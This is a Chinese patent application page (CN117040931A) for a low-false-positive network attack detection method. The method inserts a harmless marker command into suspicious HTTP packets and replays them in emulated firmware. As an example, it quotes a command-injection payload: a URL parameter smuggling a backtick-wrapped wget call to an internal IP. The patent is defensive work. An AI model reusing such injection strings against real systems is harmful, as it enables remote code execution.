CN117040931A - 低误报率的网络攻击检测方法、系统及相关设备 - Google Patents
低误报率的网络攻击检测方法、系统及相关设备 Download PDFInfo
- Publication number
- CN117040931A CN117040931A CN202311292414.1A CN202311292414A CN117040931A CN 117040931 A CN117040931 A CN 117040931A CN 202311292414 A CN202311292414 A CN 202311292414A CN 117040931 A CN117040931 A CN 117040931A
- Authority
- CN
- China
- Prior art keywords
- message
- threat
- attack detection
- network attack
- threat message
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000001514 detection method Methods 0.000 title claims abstract description 69
- 238000004088 simulation Methods 0.000 claims abstract description 32
- 238000004458 analytical method Methods 0.000 claims abstract description 21
- 230000003313 weakening effect Effects 0.000 claims abstract description 10
- 238000004806 packaging method and process Methods 0.000 claims abstract description 7
- 238000000034 method Methods 0.000 claims description 26
- 238000004590 computer program Methods 0.000 claims description 10
- 238000012544 monitoring process Methods 0.000 claims description 8
- 238000007781 pre-processing Methods 0.000 claims description 7
- 238000004891 communication Methods 0.000 claims description 4
- 238000001914 filtration Methods 0.000 claims description 3
- 230000006399 behavior Effects 0.000 abstract description 11
- 238000010586 diagram Methods 0.000 description 6
- 230000008569 process Effects 0.000 description 6
- 230000000694 effects Effects 0.000 description 4
- 230000009471 action Effects 0.000 description 2
- 230000009286 beneficial effect Effects 0.000 description 2
- 230000003287 optical effect Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 238000013473 artificial intelligence Methods 0.000 description 1
- 238000004364 calculation method Methods 0.000 description 1
- 238000005516 engineering process Methods 0.000 description 1
- 230000006870 function Effects 0.000 description 1
- 238000003780 insertion Methods 0.000 description 1
- 230000037431 insertion Effects 0.000 description 1
- 230000009545 invasion Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000011160 research Methods 0.000 description 1
- 238000012549 training Methods 0.000 description 1
- 238000012546 transfer Methods 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L69/00—Network arrangements, protocols or services independent of the application payload and not provided for in the other groups of this subclass
- H04L69/22—Parsing or analysis of headers
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L9/00—Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
- H04L9/40—Network security protocols
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L2212/00—Encapsulation of packets
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本发明适用于互联网安全技术领域,尤其涉及一种低误报率的网络攻击检测方法、系统及相关设备。本发明提出了一种基于预检测和仿真固件分析的网络攻击检测方法,该方法通过对网络流量中的威胁报文进行分析,并通过代码弱化手段将威胁报文中难于判定的攻击行为转化为了易于感知和判定的可监测行为,并根据实际的报文行为得到网络攻击检测结果,相较于现有技术,本发明不根据预设特征库来识别威胁报文,提高了未知网络攻击的识别率;并且基于可感知的报文封装方式,能够减少网络攻击检测流程对系统资源的占用,并降低了网络攻击检测的误报率。
Description
技术领域
本发明适用于互联网安全技术领域,尤其涉及一种低误报率的网络攻击检测方法、系统及相关设备。
背景技术
网络安全事件是运用互联网的现代社会亟需解决的问题之一,而部署网络攻击检测设备、及时发现网络攻击是保护网络安全的重要手段。当下用于网络攻击检测的方法虽然多种多样,各有特色,但每种方法也都存在一定局限性。
相关技术中,基于恶意代码特征匹配的网络攻击检测方法虽然误报率低、速度快、占用资源少,但只能识别特征库中已知的攻击,容易被攻击者绕过,并且对未知的攻击无能为力;以污点分析为代表的动态执行网络攻击检测方法虽然能够发现未知攻击,但计算资源消耗大、运行速度慢,并且对捕获到的样本行为是否为恶意行为缺乏准确的判别规则,容易产生误报;而基于人工智能的网络攻击检测方法虽然也能够发现未知攻击,且运行速度较动态执行方法快,但会由于模型的训练不足或样本过少,使得识别过程容易产生大量误报,给后续分析工作带来很大压力。
因此,如何在特定场景或通用场景中快速、准确地进行网络攻击检测是网络安全研究中的热点内容。
发明内容
本发明提供一种低误报率的网络攻击检测方法、系统及相关设备,旨在解决现有技术对网络攻击检测的方法资源消耗大、误报率高的技术问题。
为解决上述技术问题,第一方面,本发明提供一种低误报率的网络攻击检测方法,所述网络攻击检测方法包括以下步骤:
S101、获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文;
S102、对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文;
S103、将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态;
S104、根据所述执行状态生成所述威胁报文的网络攻击检测结果。
更进一步地,步骤S102包括以下子步骤:
对所述威胁报文进行语法构成分析,并记录所述威胁报文中疑似攻击命令的语句所在报文数据包的命令位置;
在所述命令位置中插入所述预设可感知命令;
根据所述仿真虚拟固件的信息,对插入了所述预设可感知命令的所述威胁报文进行封装,得到所述弱化威胁报文。
更进一步地,步骤S103包括以下子步骤:
将所述弱化威胁报文注入仿真虚拟固件并执行,并监测所述弱化威胁报文的所述执行状态;
根据所述执行状态判断是否在所述仿真虚拟固件中生成了对应所述预设可感知命令的事件:
若否,则标记所述威胁报文为误报事件,并返回步骤S101;
若是,则标记所述威胁报文为攻击事件,并将所述执行状态进行保存。
更进一步地,步骤S104具体为:
将标记为所述攻击事件的所述威胁报文、以及对应所述威胁报文的所述执行状态输出作为所述网络攻击检测结果。
更进一步地,所述网络攻击检测方法还包括步骤:
S105,将所述仿真虚拟固件还原为所述弱化威胁报文注入前的状态,并返回步骤S101。
更进一步地,所述预设可感知命令为以下可执行命令中的至少一种:
在指定位置创建、更改、删除文件夹;
在指定文件中创建、更改、删除字符。
更进一步地,所述仿真虚拟固件的信息包括以下信息中的至少一种:
通信地址和固件地址。
第二方面,本发明还提供一种低误报率的网络攻击检测系统,包括:
过滤模块,用于获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文;
弱化模块,用于对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文;
监控模块,用于将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态;
输出模块,用于根据所述执行状态生成所述威胁报文的网络攻击检测结果。
第三方面,本发明还提供一种计算机设备,包括:存储器、处理器及存储在所述存储器上并可在所述处理器上运行的计算机程序,所述处理器执行所述计算机程序时实现如上述实施例中任意一项所述的低误报率的网络攻击检测方法中的步骤。
第四方面,本发明还提供一种计算机可读存储介质,所述计算机可读存储介质上存储有计算机程序,所述计算机程序被处理器执行时实现如上述实施例中任意一项所述的低误报率的网络攻击检测方法中的步骤。
本发明所达到的有益效果,在于提出了一种基于预检测和仿真固件分析的网络攻击检测方法,该方法通过对网络流量中的威胁报文进行分析,并通过代码弱化手段将威胁报文中难于判定的攻击行为转化为了易于感知和判定的可监测行为,并根据实际的报文行为得到网络攻击检测结果,相较于现有技术,本发明不根据预设特征库来识别威胁报文,提高了未知网络攻击的识别率;并且基于可感知的报文封装方式,能够减少网络攻击检测流程对系统资源的占用,并降低了网络攻击检测的误报率。
附图说明
图1是本发明实施例提供的低误报率的网络攻击检测方法的步骤流程框图;
图2是本发明实施例提供的低误报率的网络攻击检测系统的结构示意图;
图3是本发明实施例提供的计算机设备的结构示意图。
具体实施方式
为了使本发明的目的、技术方案及优点更加清楚明白,以下结合附图及实施例,对本发明进行进一步详细说明。应当理解,此处所描述的具体实施例仅仅用以解释本发明,并不用于限定本发明。
请参照图1,图1是本发明实施例提供的低误报率的网络攻击检测方法的步骤流程框图,所述网络攻击检测方法包括以下步骤:
S101、获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文。
本发明实施例中获取网络流量的方式可以是通过现有的网络抓包工具实现。步骤S101的主要目的是初步分析获取到的网络流量中是否包含所述威胁报文,为了提高检测效率,可以采用运行速度较快的预设分析方法来进行,本发明实施例中,所述预设分析方法可以是基于人工智能方法或流量清洗方法的方式实现,本发明实施例对此不进行限制。
S102、对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文。
步骤S102包括以下子步骤:
S1021、对所述威胁报文进行语法构成分析,并记录所述威胁报文中疑似攻击命令的语句所在报文数据包的命令位置;
S1022、在所述命令位置中插入所述预设可感知命令;
S1023、根据所述仿真虚拟固件的信息,对插入了所述预设可感知命令的所述威胁报文进行封装,得到所述弱化威胁报文。
本发明实施例中对所述威胁报文进行语法构成分析的方式可以是基于QEMU系统模式运行固件、并使用Firmadyne工具实现,本发明实施例以上述固件和攻击来分析http(HyperText Transfer Protocol,超文本传输协议)协议的网络流量为例进行说明:
通常来说,网络中正常传输的http协议的数据包中不应该包含shell命令(使目标设备执行指定操作的命令),因此包含下载执行、修改权限、获取设备敏感信息等shell命令的数据包都是异常的。
为此,本发明实施例在步骤S1021中,首先将http数据包解析成包含请求方法、URL(Uniform Resource Locator,统一资源定位器)、参数、版本、各头字段、body等数据包字段信息,传入已有的shell命令(一种脚本程序)词法分析器中,shell命令词法分析器依赖shell词法元素对以上字段信息进行解析,从而分析锁定数据包中的敏感命令。
示例性的,在获取到的http数据包中action字段的值为:
wkTextContent.aspx?navigationContentID=099e45f5-abe4-466a-956e-2835e4525f9a+%60wget+http%3a%2f%2f192.168.134.1%3a25509%2fAppScanMsg.html%3fvarId%3d12583%60&;mid=ydyx\;
经过shell命令词法分析器进行敏感词分析后,锁定wget(一种用于下载文件的指令)为可疑的shell命令元素(对计算机系统造成较重影响的命令),随后在wget前方插入预设可感知命令。
本发明实施例中的所述预设可感知命令是指一个可轻易被监测感知的,无害的shell命令。所述预设可感知命令为以下可执行命令中的至少一种:
在指定位置创建、更改、删除文件夹;
在指定文件中创建、更改、删除字符。
当步骤S1021记录到所述命令位置后,可以在该位置中加入所述预设可感知命令,例如mkdir/tmp/flag;exit;该语句插入对应的攻击语句后,http数据包中action字段的值变为:
wkTextContent.aspx?navigationContentID=099e45f5-abe4-466a-956e-2835e4
525f9a+%60mkdir/flag/tmp;exit;wget+http%3a%2f%2f192.168.134.1%3a25509
%2fAppScanMsg.html%3fvarId%3d12583%60&;mid=ydyx\;
包含该字段的报文执行时,会在其文件系统路径tmp目录下创建flag文件,留下入侵证据,随后执行exit命令退出,而真正的攻击语句不会执行。
实施过程中,可以根据实际需要设计所述预设可感知命令的插入方式,例如,在通过shell命令词法分析器进行敏感词分析后锁定了多个敏感词,可以记录多个敏感词位置,从而在不同位置插入所述预设可感知命令。
所述仿真虚拟固件的信息包括以下信息中的至少一种:
通信地址和固件地址。
对插入了所述预设可感知命令的所述威胁报文进行封装的作用是为了根据中运行的所述仿真虚拟固件的信息将新生成的报文重新封装成IP数据包,并发送至所述仿真虚拟固件进行执行。
S103、将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态。
步骤S103包括以下子步骤:
S1031、将所述弱化威胁报文注入仿真虚拟固件并执行,并监测所述弱化威胁报文的所述执行状态;
S1032、根据所述执行状态判断是否在所述仿真虚拟固件中生成了对应所述预设可感知命令的事件:
若否,则标记所述威胁报文为误报事件,并返回步骤S101;
若是,则标记所述威胁报文为攻击事件,并将所述执行状态进行保存。
如上所述,若根据所述执行状态判断是否在所述仿真虚拟固件中生成了对应所述预设可感知命令的事件,如加入了mkdir/tmp/flag;exit这一预设可感知命令的攻击语句后,处理过的所述弱化威胁报文执行时,会在其文件系统路径tmp目录下创建flag文件,此时,则认为产生了攻击事件。
S104、根据所述执行状态生成所述威胁报文的网络攻击检测结果。
步骤S104具体为:
将标记为所述攻击事件的所述威胁报文、以及对应所述威胁报文的所述执行状态输出作为所述网络攻击检测结果。
所述网络攻击检测方法还包括步骤:
S105,将所述仿真虚拟固件还原为所述弱化威胁报文注入前的状态,并返回步骤S101。
本发明实施例中,若所述仿真虚拟固件基于仿真环境实现,则可以在步骤S103进行前,使用仿真系统快照的方式对所述仿真虚拟固件的运行状态进行保存,对应的,步骤S105执行时可以通过读取快照的方式实现,从而提高整个检测流程的运行效率,并节约系统运行资源。需要说明的是,本发明实施例中虽然也采用了固件虚拟执行等动态方法,但与其它相关技术不同的是,本发明实施例的检测流程无需使用污点分析、符号执行等系统资源消耗较大的控制流跟踪方法,仅仅需要监测指定文件夹创建等易于感知的事件,资源消耗较少,更易于实现。
本发明所达到的有益效果,在于提出了一种基于预检测和仿真固件分析的网络攻击检测方法,该方法通过对网络流量中的威胁报文进行分析,并通过代码弱化手段将威胁报文中难于判定的攻击行为转化为了易于感知和判定的可监测行为,并根据实际的报文行为得到网络攻击检测结果,相较于现有技术,本发明不根据预设特征库来识别威胁报文,提高了未知网络攻击的识别率;并且基于可感知的报文封装方式,能够减少网络攻击检测流程对系统资源的占用,并降低了网络攻击检测的误报率。
本发明实施例还提供一种低误报率的网络攻击检测系统200,请参照图2,图2是本发明实施例提供的低误报率的网络攻击检测系统的结构示意图,所述低误报率的网络攻击检测系统200包括:
过滤模块201,用于获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文;
弱化模块202,用于对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文;
监控模块203,用于将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态;
输出模块204,用于根据所述执行状态生成所述威胁报文的网络攻击检测结果。
所述低误报率的网络攻击检测系统200能够实现如上述实施例中的低误报率的网络攻击检测方法中的步骤,且能实现同样的技术效果,参上述实施例中的描述,此处不再赘述。
本发明实施例还提供一种计算机设备,请参照图3,图3是本发明实施例提供的计算机设备的结构示意图,所述计算机设备300包括:存储器302、处理器301及存储在所述存储器302上并可在所述处理器301上运行的计算机程序。
所述处理器301调用所述存储器302存储的计算机程序,执行本发明实施例提供的低误报率的网络攻击检测方法中的步骤,请结合图1,具体包括以下步骤:
S101、获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文。
S102、对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文。
步骤S102包括以下子步骤:
对所述威胁报文进行语法构成分析,并记录所述威胁报文中疑似攻击命令的语句所在报文数据包的命令位置;
在所述命令位置中插入所述预设可感知命令;
根据所述仿真虚拟固件的信息,对插入了所述预设可感知命令的所述威胁报文进行封装,得到所述弱化威胁报文。
所述预设可感知命令为以下可执行命令中的至少一种:
在指定位置创建、更改、删除文件夹;
在指定文件中创建、更改、删除字符。
所述仿真虚拟固件的信息包括以下信息中的至少一种:
通信地址和固件地址。
S103、将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态。
步骤S103包括以下子步骤:
将所述弱化威胁报文注入仿真虚拟固件并执行,并监测所述弱化威胁报文的所述执行状态;
根据所述执行状态判断是否在所述仿真虚拟固件中生成了对应所述预设可感知命令的事件:
若否,则标记所述威胁报文为误报事件,并返回步骤S101;
若是,则标记所述威胁报文为攻击事件,并将所述执行状态进行保存。
S104、根据所述执行状态生成所述威胁报文的网络攻击检测结果。
步骤S104具体为:
将标记为所述攻击事件的所述威胁报文、以及对应所述威胁报文的所述执行状态输出作为所述网络攻击检测结果。
所述网络攻击检测方法还包括步骤:
S105,将所述仿真虚拟固件还原为所述弱化威胁报文注入前的状态,并返回步骤S101。
本发明实施例提供的计算机设备300能够实现如上述实施例中的低误报率的网络攻击检测方法中的步骤,且能实现同样的技术效果,参上述实施例中的描述,此处不再赘述。
本发明实施例还提供一种计算机可读存储介质,所述计算机可读存储介质上存储有计算机程序,该计算机程序被处理器执行时实现本发明实施例提供的低误报率的网络攻击检测方法中的各个过程及步骤,且能实现相同的技术效果,为避免重复,这里不再赘述。
本领域普通技术人员可以理解实现上述实施例方法中的全部或部分流程,是可以通过计算机程序来指令相关的硬件来完成,所述的程序可存储于一计算机可读取存储介质中,该程序在执行时,可包括如上述各方法的实施例的流程。其中,所述的存储介质可为磁碟、光盘、只读存储记忆体(Read-Only Memory,ROM)或随机存取存储器(Random AccessMemory,简称RAM)等。
需要说明的是,在本文中,术语“包括”、“包含”或者其任何其他变体意在涵盖非排他性的包含,从而使得包括一系列要素的过程、方法、物品或者装置不仅包括那些要素,而且还包括没有明确列出的其他要素,或者是还包括为这种过程、方法、物品或者装置所固有的要素。在没有更多限制的情况下,由语句“包括一个……”限定的要素,并不排除在包括该要素的过程、方法、物品或者装置中还存在另外的相同要素。
通过以上的实施方式的描述,本领域的技术人员可以清楚地了解到上述实施例方法可借助软件加必需的通用硬件平台的方式来实现,当然也可以通过硬件,但很多情况下前者是更佳的实施方式。基于这样的理解,本发明的技术方案本质上或者说对现有技术做出贡献的部分可以以软件产品的形式体现出来,该计算机软件产品存储在一个存储介质(如ROM/RAM、磁碟、光盘)中,包括若干指令用以使得一台终端(可以是手机,计算机,服务器,空调器,或者网络设备等)执行本发明各个实施例所述的方法。
上面结合附图对本发明的实施例进行了描述,所揭露的仅为本发明较佳实施例而已,但是本发明并不局限于上述的具体实施方式,上述的具体实施方式仅仅是示意性的,而不是限制性的,本领域的普通技术人员在本发明的启示下,在不脱离本发明宗旨和权利要求所保护的范围情况下,还可做出很多形式用等同变化,均属于本发明的保护之内。
Claims (10)
1.一种低误报率的网络攻击检测方法,其特征在于,所述网络攻击检测方法包括以下步骤:
S101、获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文;
S102、对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文;
S103、将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态;
S104、根据所述执行状态生成所述威胁报文的网络攻击检测结果。
2.如权利要求1所述的低误报率的网络攻击检测方法,其特征在于,步骤S102包括以下子步骤:
对所述威胁报文进行语法构成分析,并记录所述威胁报文中疑似攻击命令的语句所在报文数据包的命令位置;
在所述命令位置中插入所述预设可感知命令;
根据所述仿真虚拟固件的信息,对插入了所述预设可感知命令的所述威胁报文进行封装,得到所述弱化威胁报文。
3.如权利要求1所述的低误报率的网络攻击检测方法,其特征在于,步骤S103包括以下子步骤:
将所述弱化威胁报文注入仿真虚拟固件并执行,并监测所述弱化威胁报文的所述执行状态;
根据所述执行状态判断是否在所述仿真虚拟固件中生成了对应所述预设可感知命令的事件:
若否,则标记所述威胁报文为误报事件,并返回步骤S101;
若是,则标记所述威胁报文为攻击事件,并将所述执行状态进行保存。
4.如权利要求3所述的低误报率的网络攻击检测方法,其特征在于,步骤S104具体为:
将标记为所述攻击事件的所述威胁报文、以及对应所述威胁报文的所述执行状态输出作为所述网络攻击检测结果。
5.如权利要求1所述的低误报率的网络攻击检测方法,其特征在于,所述网络攻击检测方法还包括步骤:
S105,将所述仿真虚拟固件还原为所述弱化威胁报文注入前的状态,并返回步骤S101。
6.如权利要求1所述的低误报率的网络攻击检测方法,其特征在于,所述预设可感知命令为以下可执行命令中的至少一种:
在指定位置创建、更改、删除文件夹;
在指定文件中创建、更改、删除字符。
7.如权利要求2所述的低误报率的网络攻击检测方法,其特征在于,所述仿真虚拟固件的信息包括以下信息中的至少一种:
通信地址和固件地址。
8.一种低误报率的网络攻击检测系统,其特征在于,包括:
过滤模块,用于获取网络流量,采用预设分析方法对所述网络流量进行预处理分析,得到威胁报文;
弱化模块,用于对所述威胁报文进行解析,并将预设可感知命令插入所述威胁报文,得到弱化威胁报文;
监控模块,用于将所述弱化威胁报文注入仿真虚拟固件并执行,以获取所述弱化威胁报文的执行状态;
输出模块,用于根据所述执行状态生成所述威胁报文的网络攻击检测结果。
9.一种计算机设备,其特征在于,包括:存储器、处理器及存储在所述存储器上并可在所述处理器上运行的计算机程序,所述处理器执行所述计算机程序时实现如权利要求1-7中任意一项所述的低误报率的网络攻击检测方法中的步骤。
10.一种计算机可读存储介质,其特征在于,所述计算机可读存储介质上存储有计算机程序,所述计算机程序被处理器执行时实现如权利要求1-7中任意一项所述的低误报率的网络攻击检测方法中的步骤。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202311292414.1A CN117040931A (zh) | 2023-10-08 | 2023-10-08 | 低误报率的网络攻击检测方法、系统及相关设备 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202311292414.1A CN117040931A (zh) | 2023-10-08 | 2023-10-08 | 低误报率的网络攻击检测方法、系统及相关设备 |
Publications (1)
Publication Number | Publication Date |
---|---|
CN117040931A true CN117040931A (zh) | 2023-11-10 |
Family
ID=88630356
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202311292414.1A Pending CN117040931A (zh) | 2023-10-08 | 2023-10-08 | 低误报率的网络攻击检测方法、系统及相关设备 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN117040931A (zh) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN117909160A (zh) * | 2024-03-19 | 2024-04-19 | 华中科技大学 | 基于物联网的固件崩溃分析方法及装置 |
Citations (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103368979A (zh) * | 2013-08-08 | 2013-10-23 | 电子科技大学 | 一种基于改进K-means算法的网络安全性验证装置 |
CN108040064A (zh) * | 2017-12-22 | 2018-05-15 | 北京知道创宇信息技术有限公司 | 数据传输方法、装置、电子设备及存储介质 |
-
2023
- 2023-10-08 CN CN202311292414.1A patent/CN117040931A/zh active Pending
Patent Citations (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103368979A (zh) * | 2013-08-08 | 2013-10-23 | 电子科技大学 | 一种基于改进K-means算法的网络安全性验证装置 |
CN108040064A (zh) * | 2017-12-22 | 2018-05-15 | 北京知道创宇信息技术有限公司 | 数据传输方法、装置、电子设备及存储介质 |
Cited By (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN117909160A (zh) * | 2024-03-19 | 2024-04-19 | 华中科技大学 | 基于物联网的固件崩溃分析方法及装置 |
CN117909160B (zh) * | 2024-03-19 | 2024-06-11 | 华中科技大学 | 基于物联网的固件崩溃分析方法及装置 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN109922052B (zh) | 一种结合多重特征的恶意url检测方法 | |
US11716348B2 (en) | Malicious script detection | |
US8359653B2 (en) | Portable program for generating attacks on communication protocols and channels | |
CN109586282B (zh) | 一种电网未知威胁检测系统及方法 | |
US20170316202A1 (en) | Rasp for scripting languages | |
CN110795732A (zh) | 基于SVM的Android移动网络终端恶意代码的动静结合检测方法 | |
CN107247902B (zh) | 恶意软件分类系统及方法 | |
CN110336835B (zh) | 恶意行为的检测方法、用户设备、存储介质及装置 | |
CN117040931A (zh) | 低误报率的网络攻击检测方法、系统及相关设备 | |
CN113518077A (zh) | 一种恶意网络爬虫检测方法、装置、设备及存储介质 | |
CN114553523A (zh) | 基于攻击检测模型的攻击检测方法及装置、介质、设备 | |
CN111726364A (zh) | 一种主机入侵防范方法、系统及相关装置 | |
CN107483386A (zh) | 分析网络数据的方法及装置 | |
CN113472803A (zh) | 漏洞攻击状态检测方法、装置、计算机设备和存储介质 | |
CN111400707A (zh) | 一种文件宏病毒检测方法、装置、设备及存储介质 | |
CN114024761B (zh) | 网络威胁数据的检测方法、装置、存储介质及电子设备 | |
CN110210216B (zh) | 一种病毒检测的方法以及相关装置 | |
CN114024709A (zh) | 防御方法、xss漏洞的查寻方法、流量检测设备及存储介质 | |
CN109474567B (zh) | Ddos攻击溯源方法、装置、存储介质及电子设备 | |
CN112351002B (zh) | 一种报文检测方法、装置及设备 | |
CN113141332B (zh) | 一种命令注入识别方法、系统、设备及计算机存储介质 | |
CN113127862A (zh) | 一种xxe攻击检测方法、装置、电子设备及存储介质 | |
CN111259398A (zh) | 病毒防御方法、装置、设备和可读存储介质 | |
CN113922992B (zh) | 一种基于http会话的攻击检测方法 | |
CN109274676B (zh) | 基于自学习方式获取木马控制端ip地址的方法、系统和存储设备 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination |